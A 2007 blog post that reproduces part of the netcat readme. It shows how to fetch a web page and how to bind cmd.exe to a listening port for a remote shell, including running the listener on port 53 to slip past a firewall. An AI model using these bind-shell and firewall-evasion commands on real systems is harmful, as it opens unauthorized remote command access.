Friday, July 27, 2007

netcat 

From http://www.vulnwatch.org/netcat/readment.txt

To use Netcat to retrieve the home page of a web site use the command:
nc -v www.website.com 80 <>

You will see Netcat make a connection to port 80, send the text contained
in the file get.txt, and then output the web server's response to stdout.
The -v is for verbose.  It tells you a little info about the connection
when it starts.

So the leftward facing arrow ( < )means "Inject the contents of get.txt into the connection just opened to website.com port 80"  Inside the get.txt file is "GET / HTTP/1.0" and a couple of returns.  This will get the webpage.  A far more exciting thing to do is to get a quick shell going on a remote
machine by using the -l or "listen" option and the -e or "execute"
option.  You run Netcat listening on particular port for a connection.
When a connection is made, Netcat executes the program of your choice
and connects the stdin and stdout of the program to the network connection.

nc -l -p 23 -t -e cmd.exe

will get Netcat listening on port 23 (telnet).  When it gets connected to
by a client it will spawn a shell (cmd.exe).  The -t option tells Netcat
to handle any telnet negotiation the client might expect.

This will allow you to telnet to the machine you have Netcat listening on
and get a cmd.exe shell when you connect.  You could just as well use 
Netcat instead of telnet:

nc xxx.xxx.xxx.xxx 23

The -l means "listen".  The -p means "port"

The beauty of Netcat really shines when you realize that you can get it
listening on ANY port doing the same thing.  Do a little exploring and
see if the firewall you may be behind lets port 53 through.  Run Netcat
listening behind the firewall on port 53.  

nc -L -p 53 -e cmd.exe

Then from outside the firewall connect to the listening machine:

nc -v xxx.xxx.xxx.xx 53

If you get a command prompt then you are executing commands on the
listening machine.  Use 'exit' at the command prompt for a clean
disconnect. The -L (note the capital L) option will restart Netcat with
the same command line when the connection is terminated.  This way you can
connect over and over to the same Netcat process.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)